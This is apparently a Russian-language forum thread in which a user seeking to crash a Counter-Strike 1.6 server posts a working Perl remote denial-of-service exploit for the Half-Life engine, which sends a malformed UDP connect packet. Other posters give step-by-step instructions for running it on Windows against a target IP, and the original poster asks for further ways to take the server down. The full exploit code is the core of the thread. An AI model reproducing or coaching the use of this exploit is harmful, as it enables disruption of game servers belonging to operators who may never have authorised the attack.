Есть желание положить сервер КС 1.6. У админа получил добро, мол проверь мой сервер на устойчивость, а я потом исправлю. Узнал, что лучшим способ - это ДОСить. Нашел в инете вот этот эксплоит, а как им пользоваться хз... Не когда не организовывал Дос атаки, тем более на КС сервера... гуглил в инет "инструкцию по досу" и не чего не нашел.... (значит так гуглил) Помогите плиз. Киньте в меня ссылкой, где подробно описано... Вот сам эксплоит ---> и пару вопросов... Его как нить надо "изменять" или просто открываешь в цмд "путь до перлы -> cs.pl -> ИП...? Code: #!/usr/bin/perl # Half-Life engine remote DoS exploit # bug found by Firestorm # tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server use IO::Socket; die "usage: ./csdos <host>" unless $ARGV[0]; $host=$ARGV[0]; if (fork()) { econnect($host); } else { econnect($host); }; exit; sub econnect($) { my $host=$_[0]; my $sock = new IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp'); die "Could not create socket: $!\n" unless $sock; $cmd="\xff\xff\xff\xff"; syswrite $sock, $cmd."getchallenge"; sysread $sock,$b,65535; print $b,"\n"; @c=split(/ /,$b); $c2=$c[1]; $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0"; print '>',$q,"\n"; syswrite $sock, $q; sysread $sock,$b,65535; print $b,"\n"; sleep 3; close $sock; }
в 1-й строке у тебя путь до перлы! если в мастдае то пропиши какой программой открывается данный файл!
То есть....? Я должен изменить путь (то есть поместить эксплоит, так что бы путь был (оканчивался) #!/usr/bin/perl или наоборот (изменить путь в 1-ой сточке, что бы он совпадал с путем где находиться файл)? Должен менять код вообще? Ужасный нубяра я в этих делах и просьба отнестись с пониманием и помочь, а не кричать "ЛЕСОМ//// Гугли///"
Aesthete досить сервер ты собрался со своей машины? )) по поводу perl в первой строчке нужно прописать путь до perl.exe (по идее под винду не кодил). попробуй запустить так perl.exe cl.pl 127.0.0.1 тк скриптос запускается с параметром ip сервера который досить... Aesthete прочитай про DoS что бы атака была успешной тебе нужны большие мощности, больше компов - сеть. Сейчас это сравнимо как будто ты хочешь задосить яндекс нажимая на обновить в обозревателе )))
ДА сделайте скрин плиз, как это должно выглядит. У меня остались главные вопросы.... 1. Менять скрипт надо? Если я правельно понял, то скрипт должен поменять под себя. А именно - первая строчка "#!/usr/bin/perl", поменять на "C:\Perl\Perl\bin\perl"? 2. cmd именно так должен выглядит??? Да киньте сыслкой, как организовать дос. Я профан вы этом деле, так что особо не ругаться...
Aesthete щас протестил в винде (activePerl качать лень проверил на денвере) сделал файлик test.pl с содержанием print "lol\n"; нажал win+R набрал cmd в консоли набрал: D: cd \Denver\usr\local\miniperl\ miniperl.exe C:\test.pl все прекрасно работает. тебе нужно исправить сплоит - удалить строку 1 #!/usr/bin/perl, положить его например в корень C: под именем exploit.pl окрыть cmd набрать С: cd \Perl\Perl\bin\ perl C:\exploit.pl 127.0.0.1 потом тебе нужно будет положить денюжку мне на вебмани и ждать голубого деда мороза
Ошибка эта (про класс С) Вылазит при не соответствии версий клиента и сервера. Так что сплойт бесполезен.
Есть ли возможность положить сервер, какими другими способами... Дайте "название" способа и пойду гуглить...
Досил этим скриптом еще тем летом... у него борода выросла! Но вроде до сих пор актуален. Оригинал Ошибка существует со времен CS1.5 из за неправильной проверки или ее отсутствия на длину пакета в инфе клиента...